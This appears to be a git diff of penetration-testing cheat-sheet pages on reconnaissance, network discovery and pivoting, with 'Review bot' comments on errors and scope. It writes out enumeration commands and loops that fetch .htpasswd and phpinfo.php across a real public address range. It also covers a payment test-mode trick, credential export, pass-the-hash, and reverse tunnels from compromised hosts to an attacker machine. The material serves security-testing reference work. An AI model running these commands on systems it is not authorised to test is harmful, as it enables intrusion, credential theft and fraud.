nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
```
* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
```bash
look for JS files, old links
```
* Using The Harvester (https://github.com/laramies/theHarvester)
```python
python theHarvester.py -b all -d domain.com
```
## Active recon
* Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```
* Basic NMAP
```bash
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -iL INPUTFILE tells Nmap to use the provided file as inputs
```
* CTF NMAP
This configuration is enough to do a basic check for a CTF VM
```bash
nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
-sV : Probe open ports to determine service/version info
-sC : to enable the script
-oA : to save the results
After this quick command you can add "-p-" to run a full scan while you work with the previous result
```
* Aggressive NMAP
```bash
nmap -A -T4 scanme.nmap.org
• -A: Enable OS detection, version detection, script scanning, and traceroute
• -T4: Defines the timing for the task (options are 0-5 and higher is faster)
```
* NMAP and add-ons
* Using searchsploit to detect vulnerable services
```bash
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
```
* Generating nice scan report
```bash
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
```
* NMAP Scripts
```bash
nmap -sC : equivalent to --script=default
nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /.git/HEAD: Git folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
nmap --script smb-enum-users.nse -p 445 [target host]
Host script results:
| smb-enum-users:
| METASPLOITABLE\backup (RID: 1068)
| Full name: backup
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bin (RID: 1004)
| Full name: bin
| Flags: Account disabled, Normal user account
| METASPLOITABLE\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
List Nmap scripts : ls /usr/share/nmap/scripts/
```
* RPCClient
```bash
╰─$ rpcclient -U "" [target host]
rpcclient $> querydominfo
Domain: WORKGROUP
Server: METASPLOITABLE
Comment: metasploitable server (Samba 3.0.20-Debian)
Total Users: 35
rpcclient $> enumdomusers
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
```
* Enum4all
```bash
Usage: ./enum4linux.pl [options]ip
-U get userlist
-M get machine list*
-S get sharelist
-P get password policy information
-G get group and member list
-d be detailed, applies to -U and -S
-u user specify username to use (default “”)
-p pass specify password to use (default “”
-a Do all simple enumeration (-U -S -G -P -r -o -n -i).
-o Get OS information
-i Get printer information
==============================
| Users on XXX.XXX.XXX.XXX |
==============================
index: 0x1 Account: games Name: games Desc: (null)
index: 0x2 Account: nobody Name: nobody Desc: (null)
index: 0x3 Account: bind Name: (null) Desc: (null)
index: 0x4 Account: proxy Name: proxy Desc: (null)
index: 0x5 Account: syslog Name: (null) Desc: (null)
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 Account: www-data Name: www-data Desc: (null)
index: 0x8 Account: root Name: root Desc: (null)
```
* Zone Transfer
```powershell
host -t ns domain.local
domain.local name server master.domain.local.
host master.domain.local
master.domain.local has address 192.168.1.1
dig axfr domain.local @192.168.1.1
```
## List all the subdirectories and files
* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
```bash
git clone https://github.com/mazen160/bfac
Check a single URL
bfac --url http://example.com/test.php --level 4
Check a list of URLs
bfac --list testing_list.txt
```
* Using DirBuster or GoBuster
```bash
./gobuster -u http://buffered.io/ -w words.txt -t 10
-u url
-w wordlist
-t threads
More subdomain :
./gobuster -m dns -w subdomains.txt -u google.com -i
gobuster -w wordlist -u URL -r -e
```
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```bash
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```
* Using a script to detect all .htpasswd files in a range of IPs
```bash
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```
## Looking for Web vulnerabilities
* Look for private information in GitHub repos with GitRob
```bash
git clone https://github.com/michenriksen/gitrob.git
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
```
* Explore the website with a proxy (ZAP/Burp Suite)
1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
3. Explore and understand available functionality, noting areas that correspond to vulnerability types
```bash
Burp Proxy configuration on port 8080 (in .bashrc):
alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
then launch Burp with : java -jar burpsuite_free_v*.jar &
```
* [Checklist for Web vulns](http://mdsec.net/wahh/tasks.html)
* Subscribe to the site and pay for the additional functionality to test
* Launch a Nikto scan in case you missed something
```powershell
nikto -h http://domain.example.com
```
* Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
> if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free
From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. "
e.g :
Test card numbers and tokens
| NUMBER | BRAND | TOKEN |
| :------------- | :------------- | :------------- |
| 4242424242424242 | Visa | tok_visa |
| 4000056655665556 | Visa (debit) | tok_visa_debit |
| 5555555555554444 | Mastercard | tok_mastercard |
International test card numbers and tokens
| NUMBER | TOKEN | COUNTRY | BRAND |
| :------------- | :------------- | :------------- | :------------- |
| 4000000400000008 | tok_at | Austria (AT) | Visa |
| 4000000560000004 | tok_be | Belgium (BE) | Visa |
| 4000002080000001 | tok_dk | Denmark (DK) | Visa |
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
| 4000002500000003 | tok_fr | France (FR) | Visa |
## References
* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
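Review bot: the phpinfo.php and .htpasswd sweep scripts in the removed body hardcode a concrete public range, `for ipa in 98.13{6..9}.{0..255}.{0..255}; do`, which is a specific third party's /14 rather than a placeholder; if the snippet is kept on the destination page the range should be replaced by a variable such as `${TARGET_RANGE}` (with a note that it must come from the engagement scope), otherwise a reader copy-pasting the loop sweeps addresses they are not authorised to touch. Two smaller items in the same hunk worth fixing during the move: the `* Enum4all` bullet documents `./enum4linux.pl [options]ip`, so the label should be enum4linux, and the Stripe test-card table is copied from the Stripe documentation, so it should carry the source link as a citation rather than appearing as the page's own data.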


@@ -0,0 +1,27 @@
# Miscellaneous & Tricks
All the tricks that couldn't be classified somewhere else.
## Send a message to another user
```powershell
# Windows
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
# Linux
$ wall "Stop messing with the XXX service !"
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
$ who
$ write root pts/2 # press Ctrl+D after typing the message.
```
## CrackMapExec Credential Database
```ps1
cmedb (default) > workspace create test
cmedb (test) > workspace default
cmedb (test) > proto smb
cmedb (test)(smb) > creds
cmedb (test)(smb) > export creds csv /tmp/creds
```
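Review bot: `cmedb (test)(smb) > export creds csv /tmp/creds` writes every harvested username, hash and password in clear text into a world-readable directory; suggest pointing the example at a path inside the operator's workspace (or adding a note to `chmod 600` the export) so the snippet does not normalise leaving loot in /tmp on a shared jump host. Also, CrackMapExec is archived and its maintained fork NetExec ships the same database shell as `nxcdb` with an identical workspace/proto/creds workflow, so the `## CrackMapExec Credential Database` heading and `cmedb` prompt will date quickly; a one-line mention that the commands apply unchanged under `nxcdb` would keep the section usable. The hunk header announces 27 added lines but the rendered diff shows fewer, so please confirm nothing was lost in the paste.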


@@ -1,160 +1,14 @@
# Network Discovery # Network Discovery
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/network-discovery](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/)
- [Nmap](#nmap) - [Nmap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#nmap)
- [Masscan](#masscan) - [Network Scan with nc and ping](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#network-scan-with-nc-and-ping)
- [Netdiscover](#netdiscover) - [Spyse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#spyse)
- [Responder](#responder) - [Masscan](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#masscan)
- [Bettercap](#bettercap) - [Netdiscover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#netdiscover)
- [Reconnoitre](#reconnoitre) - [Responder](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#responder)
- [References](#references) - [Bettercap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#bettercap)
- [Reconnoitre](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#reconnoitre)
## Nmap - [SSL MITM with OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#ssl-mitm-with-openssl)
- [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#references)
* Ping sweep (No port scan, No DNS resolution)
```powershell
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
-sn : Disable port scanning. Host discovery only.
-n : Never do DNS resolution
```
* Basic NMAP
```bash
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -iL INPUTFILE tells Nmap to use the provided file as inputs
```
* CTF NMAP
This configuration is enough to do a basic check for a CTF VM
```bash
nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
-sV : Probe open ports to determine service/version info
-sC : to enable the script
-oA : to save the results
After this quick command you can add "-p-" to run a full scan while you work with the previous result
```
* Aggressive NMAP
```bash
nmap -A -T4 scanme.nmap.org
• -A: Enable OS detection, version detection, script scanning, and traceroute
• -T4: Defines the timing for the task (options are 0-5 and higher is faster)
```
* Using searchsploit to detect vulnerable services
```bash
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
```
* Generating nice scan report
```bash
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
```
* NMAP Scripts
```bash
nmap -sC : equivalent to --script=default
nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /.git/HEAD: Git folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
nmap --script smb-enum-users.nse -p 445 [target host]
Host script results:
| smb-enum-users:
| METASPLOITABLE\backup (RID: 1068)
| Full name: backup
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bin (RID: 1004)
| Full name: bin
| Flags: Account disabled, Normal user account
| METASPLOITABLE\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
List Nmap scripts : ls /usr/share/nmap/scripts/
```
## Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
```
## Reconnoitre
Dependencies:
* nbtscan
* nmap
```powershell
python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick
```
If you have a segfault with nbtscan, read the following quote.
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
## Netdiscover
```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```
## Responder
```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
## Bettercap
```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
## References
* [TODO](TODO)
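Review bot: the removed page ends with a placeholder reference, `* [TODO](TODO)`, and the Bettercap section, `bettercap -X --proxy --proxy-https -T <target IP>`, uses the command-line switches of the legacy Ruby bettercap 1.x; the current Go bettercap 2.x exposes the same sniffing, spoofing and interception through modules (`net.probe`, `arp.spoof`, `http.proxy`, `https.proxy`) and does not accept these flags. If this content was moved verbatim, replace the TODO with real references and either label the Bettercap command as 1.x-only or update it to the 2.x module syntax. Minor: `targetting` in the trailing comment should be "targeting", and `# better cap` should be "bettercap".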


@@ -1,261 +1,29 @@
# Network Pivoting Techniques # Network Pivoting Techniques
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/redteam/pivoting/network-pivoting-techniques](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/)
* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) * [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table)
* [SSH](#ssh) * [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding)
* [SOCKS Proxy](#socks-proxy) * [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh)
* [Local Port Forwarding](#local-port-forwarding) * [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy)
* [Remote Port Forwarding](#remote-port-forwarding) * [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding)
* [Proxychains](#proxychains) * [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding)
* [Web SOCKS - reGeorg](#web-socks---regeorg) * [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains)
* [Metasploit](#metasploit) * [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp)
* [sshuttle](#sshuttle) * [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg)
* [chisel](#chisel) * [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci)
* [Rpivot](#rpivot) * [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit)
* [plink](#plink) * [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle)
* [ngrok](#ngrok) * [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel)
* [Basic Pivoting Types](#basic-pivoting-types) * [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel)
* [Listen - Listen](#listen---listen) * [gost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#gost)
* [Listen - Connect](#listen---connect) * [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot)
* [Connect - Connect](#connect---connect) * [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks)
* [References](#references) * [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink)
* [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok)
## Windows netsh Port Forwarding * [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools)
* [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types)
```powershell * [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen)
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport * [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect)
* [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect)
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 * [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references)
```
1. listenaddress is a local IP address waiting for a connection.
2. listenport local listening TCP port (the connection is waited on it).
3. connectaddress is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport is a TCP port to which the connection from listenport is forwarded to.
## SSH
### SOCKS Proxy
```bash
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
```
Cool Tip : Konami SSH Port forwarding
```bash
[ENTER] + [~C]
-D 1090
```
### Local Port Forwarding
```bash
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
```bash
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
```
## Proxychains
**Config file**: /etc/proxychains.conf
```bash
[ProxyList]
socks4 localhost 8080
```
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
## Web SOCKS - reGeorg
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
```python
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
```
## Metasploit
```powershell
# Meterpreter list active port forwards
portfwd list
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add l 3389 p 3389 r target-host
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete l 3389 p 3389 r target-host
# Meterpreter delete all port forwards
portfwd flush
or
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24
use auxiliary/server/socks4a
# Meterpreter list all active routes
run autoroute -p
route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3
# Meterpreter delete all routes
route flush
```
## sshuttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
* Doesn't require admin.
* Works with Linux and MacOS.
* Supports DNS tunneling.
```powershell
pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24
```
## chisel
```powershell
go get -v github.com/jpillora/chisel
# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
```
## Rpivot
Server (Attacker box)
```python
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
```
Client (Compromised box)
```python
python client.py --server-ip <ip> --server-port 9443
```
Through corporate proxy
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
```
Passing the hash
```python
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
```
## plink
```powershell
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
```
## ngrok
```powershell
# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433
```
## Basic Pivoting Types
| Type | Use Case |
| :------------- | :------------------------------------------ |
| Listen - Listen | Exposed asset, may not want to connect out. |
| Listen - Connect | Normal redirect. |
| Connect - Connect | Cant bind, so connect to bridge two hosts |
### Listen - Listen
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
| socat | `socat -v tcp-listen:8080 tcp-listen:9090` |
| remote host 1 | `ncat localhost 8080 < file` |
| remote host 2 | `ncat localhost 9090 > newfile` |
### Listen - Connect
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat localhost -p 8080 < file` |
| remote host 2 | `ncat -l -p 9090 > newfile` |
### Connect - Connect
| Type | Use Case |
| :------------- | :------------------------------------------ |
| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` |
| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
| remote host 1 | `ncat -l -p 8080 < file |
| remote host 2 | `ncat -l -p 9090 > newfile` |
## References
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
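Review bot: the removed body of this file carries defects that should be fixed in the InternalAllTheThings page the stub now points to rather than copied over verbatim. In the Metasploit block, `portfwd add l 3389 p 3389 r target-host` and `portfwd delete l 3389 p 3389 r target-host` are missing the `-` on every flag (compare the correct `portfwd add -l 88 -p 88 -r 127.0.0.1` two lines below), and the comment above the delete line still reads "Forwards 3389 (RDP)". The netsh example `netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110` forwards to the same address it listens on, which shows no pivot; a second host as connectaddress would. In the Connect - Connect table the cell `ncat -l -p 8080 < file` is missing its closing backtick. The new-side index also links anchors the old page never had, such as `#capture-a-network-trace-with-builtin-tools`, so the destination page should be checked to confirm those sections exist.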

View File

@@ -0,0 +1,37 @@
# Office - Attacks
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/office-attacks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/)
* [Office Products Features](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-products-features)
* [Office Default Passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-default-passwords)
* [Office Macro execute WinAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-macro-execute-winapi)
* [Excel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#excel)
* [XLSM - Hot Manchego](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlsm---hot-manchego)
* [XLS - Macrome](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xls---macrome)
* [XLM Excel 4.0 - SharpShooter](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---sharpshooter)
* [XLM Excel 4.0 - EXCELntDonut](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---excelntdonut)
* [XLM Excel 4.0 - EXEC](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---exec)
* [SLK - EXEC](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#slk---exec)
* [Word](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#word)
* [DOCM - Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---metasploit)
* [DOCM - Download and Execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---download-and-execute)
* [DOCM - Macro Creator](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---macro-creator)
* [DOCM - C# converted to Office VBA macro](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---c-converted-to-office-vba-macro)
* [DOCM - VBA Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-wscript)
* [DOCM - VBA Shell Execute Comment](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-shell-execute-comment)
* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-spawning-via-svchostexe-using-scheduled-task)
* [DCOM - WMI COM functions (VBA AMSI)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---wmi-com-functions)
* [DOCM - winmgmts](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---winmgmts)
* [DOCM - Macro Pack - Macro and DDE](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docmxlm---macro-pack---macro-and-dde)
* [DOCM - BadAssMacros](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---badassmacros)
* [DOCM - CACTUSTORCH VBA Module](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---cactustorch-vba-module)
* [DOCM - MMG with Custom DL + Exec](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---mmg-with-custom-dl--exec)
* [VBA Obfuscation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-obfuscation)
* [VBA Purging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-purging)
